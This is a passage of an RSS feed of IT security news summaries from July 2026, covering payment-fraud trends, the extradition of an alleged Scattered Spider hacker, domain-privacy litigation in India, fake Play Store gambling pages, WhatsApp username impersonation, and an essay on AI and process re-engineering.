<content:encoded><![CDATA[<p>Payment fraud is becoming more organized as criminal groups use fake websites, large-scale operations, and, in some cases, forced labor to steal money and personal information. Advances in agentic AI could automate many stages of payment fraud, from collecting and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-future-of-payment-fraud-could-be-automated/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-future-of-payment-fraud-could-be-automated/">The future of payment fraud could be automated</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The future of payment fraud could be automated]]></title>
<description><![CDATA[Payment fraud is becoming more organized as criminal groups use fake websites, large-scale operations, and, in some cases, forced labor to steal money and personal information. Advances in agentic AI could automate many stages of payment fraud, from collecting and assembling stolen credentials to...]]></description>
<link>https://tsecurity.de/de/3647711/it-security-nachrichten/the-future-of-payment-fraud-could-be-automated/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647711/it-security-nachrichten/the-future-of-payment-fraud-could-be-automated/</guid>
<pubDate>Mon, 06 Jul 2026 06:07:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Payment fraud is becoming more organized as criminal groups use fake websites, large-scale operations, and, in some cases, forced labor to steal money and personal information. Advances in agentic AI could automate many stages of payment fraud, from collecting and assembling stolen credentials to deploying password-cracking tools. What kind of payment fraud concerns you most? (Source: Capco) CAPCO’s “US Payment Fraud Survey” found that consumers increasingly value fraud protection when choosing payment providers. Security was … <a href="https://www.helpnetsecurity.com/2026/07/06/key-payment-fraud-trends-report/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/06/key-payment-fraud-trends-report/">The future of payment fraud could be automated</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 Identifier Code Used to Arrest 19-Year-Old Over Alleged Ransomware Spree]]></title>
<description><![CDATA[America's Justice Department and FBI teamed joined Finland's National Bureau of Investigation to arrest a teenager they say is part of one of the world's biggest cybercrime syndicates, reports Tom's Hardware. The "Scattered Spider" syndicate has extorted over $100 million in ransom payments, acco...]]></description>
<link>https://tsecurity.de/de/3647085/it-security-nachrichten/windows-11-identifier-code-used-to-arrest-19-year-old-over-alleged-ransomware-spree/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647085/it-security-nachrichten/windows-11-identifier-code-used-to-arrest-19-year-old-over-alleged-ransomware-spree/</guid>
<pubDate>Sun, 05 Jul 2026 20:05:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[America's Justice Department and FBI teamed joined Finland's National Bureau of Investigation to arrest a teenager they say is part of one of the world's biggest cybercrime syndicates, reports Tom's Hardware. The "Scattered Spider" syndicate has extorted over $100 million in ransom payments, according to Department of Justice figures:


19-year-old Peter Stokes is a dual U.S.-Estonian citizen who was trying to board a flight to Japan from Helsinki, when law enforcement caught up with him. [T]he main criminal complaint against Stokes stems from a May 2025 attack on a luxury jewelry dealer based in the United States. The attackers apparently called the company's IT helpdesk using Google Voice, posing as employees. They were able to convince the help desk into resetting their credentials, which allowed them to infiltrate three accounts, two of which had admin privileges. From there, the group, allegedly including Stokes, stole important data and held the jeweler at ransom, demanding an $8 million payment in crypto. The company ultimately regained access to their infrastructure and avoided paying the ransom, but the operational disruption still caused a purported $2 million in losses. This served as the spark that led to Stokes' eventual arrest in Helsinki, as the prosecutors slowly followed the paper and digital trail laid by the attackers. 


Microsoft played a key role in the process by providing GDID [Global Device Identifier] data to the FBI to help them apprehend the alleged criminal... [I]t's a unique identifier assigned to every Windows install that tracks device-specific telemetry. It's the reason why sometimes changing a major component in your PC can revoke your Windows license... [T]he court documents from the case reveal that Stokes used Windows, from which investigators were able to link his physical hardware to specific internet activity and locations... Stokes' web activity, videogame history, IP addresses, tool usage (including Ngrok), Azure status, and more were logged with timestamps, and were provided to the investigators by Microsoft... 

Stokes was carrying two hard drives full of incriminating evidence with him when boarding his flight to Japan... His real identity has actually been known since 2024, but since he was a minor living across Estonia and the UAE at the time, he could only be monitored until the time was right. 

The official criminal complaint even includes a selfie photo that Stokes posted on Snapchat (hiding his face behind dozens of hundred dollar bills). It then notes that behind Stokes the wallpaper, carpet, and furniture match New York's Empire Hotel — and that Stokes had visited the hotel's web site in Germany before then flying to New York... 

"Following the arrest, Stokes was extradited to the U.S., where he appeared in front of a federal court in Chicago for the first time on June 30, 2026, and he remains in custody," adds Tom's Hardware. 

"The accused is now awaiting trial, having been charged with conspiracy, cyber intrusion, and fraud..."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Windows+11+Identifier+Code+Used+to+Arrest+19-Year-Old+Over+Alleged+Ransomware+Spree%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F05%2F1633210%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F05%2F1633210%2Fwindows-11-identifier-code-used-to-arrest-19-year-old-over-alleged-ransomware-spree%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/05/1633210/windows-11-identifier-code-used-to-arrest-19-year-old-over-alleged-ransomware-spree?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GoDaddy Warns India's Crackdown on Fake Site Registrars Could Upend Internet Privacy Everywhere]]></title>
<description><![CDATA["The internet is filled with fakes," writes Gizmodo. "A court in India is setting out to address the problem by requiring more transparency from domain registrars to make it easier to crack down on fraud. And while the intentions might be good, Reuters is reporting that major American domain regi...]]></description>
<link>https://tsecurity.de/de/3646948/it-security-nachrichten/godaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646948/it-security-nachrichten/godaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere/</guid>
<pubDate>Sun, 05 Jul 2026 17:58:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["The internet is filled with fakes," writes Gizmodo. "A court in India is setting out to address the problem by requiring more transparency from domain registrars to make it easier to crack down on fraud. And while the intentions might be good, Reuters is reporting that major American domain registrar GoDaddy is sounding the warning bells that the court's decision could fundamentally reshape the internet well beyond India's borders." 


GoDaddy argues the move would even make the internet less safe, reports Reuters :

[Online fraud] is a key challenge for Prime Minister Narendra Modi's government, which last year received 2.4 million complaints of alleged cyber fraud amounting to $2.4 billion. Starting in 2019, lawsuits were brought by dozens of Indian and global firms — Amazon against fake shopping sites trading on its name and McDonald's complaining against bogus sites offering franchises. [More than 20 companies filed a complaint, the article notes, including Microsoft.] In December, an Indian court blocked more than 1,100 such websites. The New Delhi judge however went further, ordering sweeping new measures that tech experts say have rewritten rules of internet governance: Domain sellers should not offer buyers free privacy protection by default, the buyer's details should be released to anyone with a "legitimate interest" within 72 hours, and website addresses that are variations of protected brand names must be prohibited. 


U.S.-based GoDaddy has challenged the directives before a larger bench of judges at the Delhi High Court, according to a Reuters review of non-public filings. It says the ruling will affect legitimate businesses that have names similar to big brands. Stopping privacy-by-default features, GoDaddy said, will result in public disclosure of name, address, telephone and email of legitimate website owners, exposing them to "foreseeable privacy and security risks" such as stalking and harassment. 

As domain names operate globally, not locally, the order could force GoDaddy to regulate website addresses across the world, it said. On the court's order imposing a 72-hour deadline on companies to provide registration details to anyone with "legitimate interest", GoDaddy argues it has no wherewithal to assess who has legitimate interest or not. The "commercially destabilising" directives may force domain name companies to "exit India", said one of GoDaddy's appeal documents that ran into 5,121 pages... GoDaddy rivals, Arizona-based Namecheap and Netherlands-based Hosting Concepts, have also challenged the New Delhi ruling, court records show, although Reuters could not ascertain details of their appeals... 

GoDaddy argues that diluting the privacy feature will run contrary to India's data protection law and the European Union GDPR law which mandates a "privacy by default" approach. Farzaneh Badii, a New York-based researcher on internet governance, criticised the New Delhi ruling, noting that Europe redacted such details because publishing them had been abused by harassment and targeted phishing. "The people exposed will be journalists, activists, small business owners, and private individuals. The brand impersonators will not," she said... 

While the sweeping December directives were issued by a court, they followed government's submissions, documents showed... The judges will hear the appeals on July 16. 



GoDaddy manages 80 million domains and serves over 20 million users, the article points out, with
annual revenue over $5 billion.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=GoDaddy+Warns+India's+Crackdown+on+Fake+Site+Registrars+Could+Upend+Internet+Privacy+Everywhere%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F05%2F0526213%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F05%2F0526213%2Fgodaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/05/0526213/godaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Google Play Store Pages Use Trusted Brand Names to Push Gambling PWAs]]></title>
<description><![CDATA[Scammers are exploiting consumers’ trust in household and financial brands by deploying polished fake Google Play Store pages and social media ads that push Progressive Web Apps (PWAs) linked to online casinos. The fraud begins with paid social creative on…
Read more →
The post Fake Google Play S...]]></description>
<link>https://tsecurity.de/de/3643415/it-security-nachrichten/fake-google-play-store-pages-use-trusted-brand-names-to-push-gambling-pwas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643415/it-security-nachrichten/fake-google-play-store-pages-use-trusted-brand-names-to-push-gambling-pwas/</guid>
<pubDate>Fri, 03 Jul 2026 13:36:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Scammers are exploiting consumers’ trust in household and financial brands by deploying polished fake Google Play Store pages and social media ads that push Progressive Web Apps (PWAs) linked to online casinos. The fraud begins with paid social creative on…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fake-google-play-store-pages-use-trusted-brand-names-to-push-gambling-pwas/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fake-google-play-store-pages-use-trusted-brand-names-to-push-gambling-pwas/">Fake Google Play Store Pages Use Trusted Brand Names to Push Gambling PWAs</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Google Play Store Pages Use Trusted Brand Names to Push Gambling PWAs]]></title>
<description><![CDATA[Scammers are exploiting consumers’ trust in household and financial brands by deploying polished fake Google Play Store pages and social media ads that push Progressive Web Apps (PWAs) linked to online casinos. The fraud begins with paid social creative on platforms including Facebook, Instagram,...]]></description>
<link>https://tsecurity.de/de/3643377/it-security-nachrichten/fake-google-play-store-pages-use-trusted-brand-names-to-push-gambling-pwas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643377/it-security-nachrichten/fake-google-play-store-pages-use-trusted-brand-names-to-push-gambling-pwas/</guid>
<pubDate>Fri, 03 Jul 2026 13:23:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Scammers are exploiting consumers’ trust in household and financial brands by deploying polished fake Google Play Store pages and social media ads that push Progressive Web Apps (PWAs) linked to online casinos. The fraud begins with paid social creative on platforms including Facebook, Instagram, Threads and TikTok. Ads present either simple “Brand Slots” labels or […]</p>
<p>The post <a href="https://gbhackers.com/fake-google-play-store-pages/">Fake Google Play Store Pages Use Trusted Brand Names to Push Gambling PWAs</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Spotify Confirms Streaming Fraud After Kalshi Trader Cries Foul]]></title>
<description><![CDATA[One of Kalshi’s most prominent traders tells WIRED he’s swearing off Spotify-related markets until the issue is resolved.]]></description>
<link>https://tsecurity.de/de/3642048/it-nachrichten/spotify-confirms-streaming-fraud-after-kalshi-trader-cries-foul/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642048/it-nachrichten/spotify-confirms-streaming-fraud-after-kalshi-trader-cries-foul/</guid>
<pubDate>Thu, 02 Jul 2026 20:48:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[One of Kalshi’s most prominent traders tells WIRED he’s swearing off Spotify-related markets until the issue is resolved.]]></content:encoded>
</item>
<item>
<title><![CDATA[Card Data Theft Remains Top Concern for US Consumers]]></title>
<description><![CDATA[According to a recent survey by Capco, the fraud types that most concern US consumers are card and card data theft (46%), identity theft (44%), purchases they did not make (40%) and account takeover (35%).]]></description>
<link>https://tsecurity.de/de/3641719/it-security-nachrichten/card-data-theft-remains-top-concern-for-us-consumers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641719/it-security-nachrichten/card-data-theft-remains-top-concern-for-us-consumers/</guid>
<pubDate>Thu, 02 Jul 2026 18:25:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[According to a recent survey by Capco, the fraud types that most concern US consumers are card and card data theft (46%), identity theft (44%), purchases they did not make (40%) and account takeover (35%).]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp Usernames Are Already Raising Impersonation Red Flags]]></title>
<description><![CDATA[An anonymous reader quotes a report from TechCrunch: WhatsApp this week started rolling out username reservations ahead of the broader launch planned later this year. The feature -- which lets people find and message each other by handle instead of phone number -- is already raising impersonation...]]></description>
<link>https://tsecurity.de/de/3641685/it-security-nachrichten/whatsapp-usernames-are-already-raising-impersonation-red-flags/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641685/it-security-nachrichten/whatsapp-usernames-are-already-raising-impersonation-red-flags/</guid>
<pubDate>Thu, 02 Jul 2026 18:24:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from TechCrunch: WhatsApp this week started rolling out username reservations ahead of the broader launch planned later this year. The feature -- which lets people find and message each other by handle instead of phone number -- is already raising impersonation concerns, drawing scrutiny from security experts and regulators in India, the app's largest market, with more than 500 million users. The rollout marks a shift in how people identify one another on WhatsApp. Instead of relying on phone numbers as the primary identifier, users will increasingly interact through platform-managed usernames, a change that Meta says improves privacy but that critics argue could create new opportunities for impersonation.
 
[...] Asked about how it protects against impersonation, Meta told TechCrunch it reserves usernames for public figures, government entities, and "some variations" of those names so only the legitimate owner can claim them. The company did not explain, however, how it decides which lookalike usernames get proactively reserved and which don't. The concerns have already reached regulators in India, where cyber fraud schemes frequently exploit messaging platforms to impersonate police, banks, and government officials. [...] Rachel Tobac, chief executive of SocialProof Security, called usernames a net privacy gain because they reduce the need to share phone numbers, which can expose users to SIM-swap attacks, phishing, and account takeovers. Still, she said, lookalike usernames still create opportunities for impersonation. "Ultimately, usernames are a great idea to avoid leaking your phone number to folks you don't know, but it's important to verify identity with the username function too," Tobac told TechCrunch. Her advice for most users: Pick a username that isn't easily guessable, so it's harder for attackers to find you, message you cold, or harass and spam you.
 
[...] The Mozilla Foundation said the introduction of usernames is likely to bring new tradeoffs. "Increased scams and impersonation from fake handles are potentially a big one," it told TechCrunch. "Checking a phone number can be a useful verification tool, but these harms are also permitted by the platform's fundamental design choices." Mozilla also flagged a broader interoperability question -- one worth logging if you're building on top of, or competing with, Meta's ecosystem. While letting users claim their existing Facebook and Instagram usernames may cut down on impersonation, it also shows how easily Meta can stitch identity together across its own apps, even as users still can't take that identity, or their contacts, to a rival platform. For now, WhatsApp says it is taking a gradual approach to the rollout. "We're taking our time and listening to feedback so that when it rolls out later this year we get it right," the company said in its FAQ.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=WhatsApp+Usernames+Are+Already+Raising+Impersonation+Red+Flags%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F02%2F0253203%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F07%2F02%2F0253203%2Fwhatsapp-usernames-are-already-raising-impersonation-red-flags%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/07/02/0253203/whatsapp-usernames-are-already-raising-impersonation-red-flags?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI savings are an illusion without process re-engineering]]></title>
<description><![CDATA[The PC was heralded as revolutionary; it was going to save time, revolutionize our work… But it became an opportunity lost. Paper became digital files. Filing cabinets became shared drives. Memos became email. We sometimes worked faster. We did not necessarily work differently. And we certainly d...]]></description>
<link>https://tsecurity.de/de/3640590/it-nachrichten/why-ai-savings-are-an-illusion-without-process-re-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640590/it-nachrichten/why-ai-savings-are-an-illusion-without-process-re-engineering/</guid>
<pubDate>Thu, 02 Jul 2026 11:03:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The PC was heralded as revolutionary; it was going to save time, revolutionize our work… But it became an opportunity lost. Paper became digital files. Filing cabinets became shared drives. Memos became email. We sometimes worked faster. We did not necessarily work differently. And we certainly did not work more efficiently. The underlying logic: approval chains, reporting cycles, hierarchies and incentives remained intact.</p>



<p>The internet and smartphones followed the same pattern, compressing time and distance. But neither forced enterprise changes. The tools changed. The organizational model did not. This stagnation is referred to as the Solow Productivity Paradox, a historic mismatch between massive technology investments and flat corporate productivity. And while the Internet boom did see a raise in productivity, it was due to investment in hardware, not so much due to a change in how we worked, as explained by <a href="https://www.cio.com/article/266741/it-organization-the-new-economy-what-productivity-miracle.html">Robert Gordon in The New Economy: What Productivity Miracle?</a></p>



<p>And now there’s Artificial Intelligence, AI. AI presents a different kind of challenge because it intervenes in cognition itself. It reaches much closer to the operating logic of the enterprise than previous technology waves.</p>



<p>Yet, once again, the response is surface adaptation rather than structural reinvention. AI is layered onto inherited workflows, old approval thresholds, unclear accountability structures and sprawling software, then expecting cost savings to follow. And again, it is the investments in AI that garner any growth, not changes in corporate infrastructure.</p>



<p>This is not transformation. It is acceleration without reform. And this “slap on AI” will have as much long-term impact as the PC.</p>



<h2 class="wp-block-heading">Automation = efficiency? Wrong</h2>



<p><a href="https://www.cio.com/article/4151188/ways-cios-can-prove-to-boards-that-ai-projects-will-deliver.html.">Chief information officers</a> are under intense pressure to turn AI into measurable financial outcomes. In boardrooms, expectations are explicit: deploy AI, automate, reduce operating cost and show results within a budget cycle.</p>



<p>A central misunderstanding in AI programs is the assumption that if a process is costly and labour-intensive, automation creates efficiency. Unfortunately, what appears as inefficiencies are normalized fragmentations. With AI, hidden workflow contradictions become both significant and visible. Organizations discover it wasn’t running a slow but clean process. It was running an incoherent process that relied on human buffering to keep it functioning. This is precisely why so many AI efforts disappoint immediately after a dazzling pilot, degenerate into <a href="https://www.cio.com/article/4158000/ai-strategy-theater-why-cios-are-performing-innovation-instead-of-leading-it.html.">AI strategy theatre</a> and fail to scale.</p>



<p>When one part of the workflow becomes lightning-fast, but the surrounding process remains fractured, escalations multiply and the IT department, despite having done its job perfectly, is asked to fix the operational fallout with more tooling, more integration, more controls and more spend. The problem is rarely technical. But it becomes so very quickly.</p>



<p>I increasingly think the more useful concept here is <em>process debt</em>. CIOs are already comfortable talking about <a href="https://www.cio.com/www.cio.com/article/3958666/what-is-technical-debt-a-business-risk-it-must-manage.html">technical debt</a> and its complexities. <em>Process</em> <em>debt</em> is the upstream generator of that complexity. It accumulates when temporary fixes become permanent, when controls are added without removing older ones and when incidents leave behind workflows nobody dares to challenge. Over time, the process stops reflecting deliberate design and starts reflecting institutional memory, risk aversion and unresolved negotiations between functions.</p>



<h2 class="wp-block-heading">Case study 1: The regulated approval-heavy process</h2>



<p>I was brought into a regulated organization that wanted to identify opportunities for automation. The assumption was that technology was the main constraint. Workflows involved multiple reviews, approvals and handovers between departments. From a distance, it looked like an obvious candidate for automation.</p>



<p>It was a familiar situation: delays, duplicated effort and frustration with how long routine work was taking to complete. The process seemed overstaffed and underdesigned. The natural conclusion was that automation could remove unnecessary tasks and improve speed.</p>



<p>But as I began interviewing the stakeholders, a different picture emerged. Every group could explain its role in the workflow. But the more I listened, the clearer it became that nobody could describe the process as a coherent whole.</p>



<p>What appeared to be an inefficient process was a process that had accumulated layers of governance without ever being reassembled into a consistent operating model. One approval had been added after an audit finding. Another had been introduced during a restructuring. A third existed because of a past incident. None of those approvals looked unreasonable in isolation. Together, they produced a workflow that nobody owned and with approval layers nobody could justify.</p>



<p>From the CIO’s perspective, this translated into technology sprawl. Unaligned and multiple IT systems were being used to support adjacent parts of the workflow. Software had been purchased to manage steps that shouldn’t have existed in the first place. This meant the entire nature of the automation discussion shifted. The strategic question was no longer which step should be automated first. It was whether those steps deserved to exist at all.</p>



<p>Only after the CIO and I brought the business units together to confront these structural dependencies did the process align and technology become part of the answer. Without that preliminary work, automation would simply have moved a poorly understood process faster while expanding the expensive software estate needed to govern it.</p>



<p>That engagement reinforced my conviction that many workflows presented as automation candidates are not ready for automation because they are not sufficiently coherent to automate.</p>



<h2 class="wp-block-heading">Uncomfortable questions</h2>



<p>Because these questions are operationally and politically sensitive, businesses will try to avoid them and hand the unmapped mess directly to IT. As a strategic partner, the CIO must guide the C-suite through these uncomfortable but necessary inquiries before deploying AI into enterprise workflows:</p>



<ul class="wp-block-list">
<li>Does this process need to exist at all?</li>



<li>Where are decisions actually made in day-to-day practice? Not according to policy documentation, but according to the informal networks of people who actually know how to navigate the exceptions.</li>



<li>Which parts of the workflow exist because of corporate history rather than necessity?</li>



<li>Where do decision rights shift between teams without anyone acknowledging it?</li>
</ul>



<p>AI systems do not handle ambiguities gracefully. Answering these questions upfront determines whether implementing AI will mean genuine savings or simply move organizational incoherence through the enterprise at lightning speed.</p>



<h2 class="wp-block-heading">Three-layer governance</h2>



<p>Governance is the ultimate reason why AI cannot be treated as a traditional technology delivery program with a bit of business input tacked on at the end. Because AI fundamentally alters how enterprise decisions are informed and executed, its deployment must be shaped by an integrated operating and governance framework.</p>



<p>CIOs can evaluate an organization’s true AI readiness based on three interdependent governance layers. By mastering these, the technology stack is protected from being forced to compensate for bad business design.</p>



<ol class="wp-block-list">
<li><strong>Organizational governance. </strong><em>Core questions:</em> Is this workflow genuinely needed, who actually owns it and what risk or quality definitions are binding across separate business functions? This is a cross-departmental leadership question. It must be resolved by the business units first, or IT inevitably inherits the resulting operational complexity.</li>



<li><strong>Endpoint or tool governance. </strong><em>Core questions</em>: How are outputs interpreted when cognitive work is partially or fully delegated to machines? This layer defines exactly where a human-in-the-loop remains mandatory, how exceptions are escalated to specialists and how accountability is maintained when an AI agent makes an optimized operational prediction.</li>



<li><strong>Platform governance. </strong><em>Core questions:</em> What is the foundational security, privacy and technical guardrails? This includes LLM/model selection, vendor standards, data privacy compliance, integration rules and continuous monitoring. Paradoxically, this is the layer most organizations focus on first—yet, because it exists entirely to support the processes and tools above it, it should actually be the last to be set in stone.</li>
</ol>



<p>These layers interlinked. A weakness in one undermines the others. This is where CIOs become strategically important. They are the executives who see when process incoherence is converted into architectural complexity, application sprawl, higher license costs and long-term support burdens. AI decisions without that perspective and organizations will once again confuse digitization with transformation.</p>



<h2 class="wp-block-heading">Case Study 2: A downstream bottleneck and the structural solution</h2>



<p>In another engagement, the business pushed for an AI-driven intake solution. Frontline teams were spending massive amounts of time on repetitive customer data coordination and document verification. On paper, it was an outright victory: IT delivered an AI agent that dropped data extraction times by 85% with an exceptional accuracy rate. In every sense of the word – the pilot was a triumph. And it was phased to implementation.</p>



<p>Within six weeks, the illusion shattered. While the intake layer was now running at lightning speed, the downstream validation process still relied on traditional compliance handoffs, manual fraud checks and legacy database updates. The AI didn’t solve the operational problem; it simply shoved massive volumes of data into a rigid pipeline that was never designed for that velocity.</p>



<p>Escalation queues exploded. The operations team, buried under an unprecedented backlog, began making manual bypass decisions just to keep up, creating immense operational risk.</p>



<p>Rather than allowing IT to be blamed for the downstream chaos, the CIO and I suggested a structural solution. First, we halted further automated intake scaling and used visual process-mapping data to show the rest of the C-suite exactly where the digital pipeline was hitting an analogue wall.</p>



<p>Second, we championed a cross-functional “value stream” redesign. After much negotiation, we managed to leverage the AI’s data-validation outputs to eliminate three manual review steps downstream and replace them with exception-only automated alerts. Finally, we renegotiated the risk-threshold parameters with the legal and compliance teams, shifting accountability from a multi-stage sign-off to a centralized, systemic audit log.</p>



<p>The solution wasn’t adding more software; it was picking the process apart, data point by data point, to align the business rules with machine capabilities. The result was a substantially trimmer, automated end-to-end stream that freed up human resources, allowed redundant software licenses to be safely withdrawn and actually realized the promised financial savings.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p>Every CIO knows that AI matters. The real challenge facing enterprises whether the executive leadership team is willing to confront what AI inevitably reveals about the fragmented processes, legacy habits and siloed systems organizations have been carrying for decades.</p>



<p>This is why the broad promise of immediate AI savings is overstated. Automation can produce staggering enterprise value, but it cannot create structural coherence on its own. If a workflow is fractured, historically layered and dependent on invisible human intervention, adding AI will not turn it into an efficient system. It will simply scale, cement and automate the weaknesses that were already there.</p>



<p>The CIO’s ultimate responsibility is to ensure that technically incoherent processes do not get permanent residency in the business architecture. This is why the CIO must have a leading seat at the strategic table. Incoherent processes invariably turn into application sprawl, redundant tooling, excess licensing costs, integration debt and massive security exposure.</p>



<p>To avoid this trap, enterprise AI deployment requires cross-departmental leadership willing to examine which work should be automated, which must be completely redesigned and which should be eliminated. </p>



<p>If not, we will simply repeat the costly errors of past technology shifts: preserve the outdated operating logic, throw a shiny new layer of tooling on top and call the expensive result “transformation.” This time, the bill will be significantly larger. Not because AI is mysterious, but because it is brutally efficient at exposing the waste that organizations used to hide inside their people, their processes and their software.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges]]></title>
<description><![CDATA[Alleged Scattered Spider member Peter Stokes, 19, was extradited from Finland to the U.S. over hacking, fraud, and extortion charges. Peter Stokes, 19, an alleged Scattered Spider member known online as “Bouquet,” has been extradited from Finland to the U.S. to face hacking, fraud, and extortion ...]]></description>
<link>https://tsecurity.de/de/3640547/it-security-nachrichten/alleged-scattered-spider-hacker-extradited-to-us-to-face-cybercrime-charges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640547/it-security-nachrichten/alleged-scattered-spider-hacker-extradited-to-us-to-face-cybercrime-charges/</guid>
<pubDate>Thu, 02 Jul 2026 10:39:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Alleged Scattered Spider member Peter Stokes, 19, was extradited from Finland to the U.S. over hacking, fraud, and extortion charges. Peter Stokes, 19, an alleged Scattered Spider member known online as “Bouquet,” has been extradited from Finland to the U.S. to face hacking, fraud, and extortion charges. Prosecutors say he took part in multiple cyberattacks, […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges]]></title>
<description><![CDATA[Alleged Scattered Spider member Peter Stokes, 19, was extradited from Finland to the U.S. over hacking, fraud, and extortion charges. Peter Stokes, 19, an alleged Scattered Spider member known online as “Bouquet,” has been extradited from Finland to the U.S.…
Read more →
The post Alleged Scattere...]]></description>
<link>https://tsecurity.de/de/3640541/it-security-nachrichten/alleged-scattered-spider-hacker-extradited-to-us-to-face-cybercrime-charges/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640541/it-security-nachrichten/alleged-scattered-spider-hacker-extradited-to-us-to-face-cybercrime-charges/</guid>
<pubDate>Thu, 02 Jul 2026 10:38:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
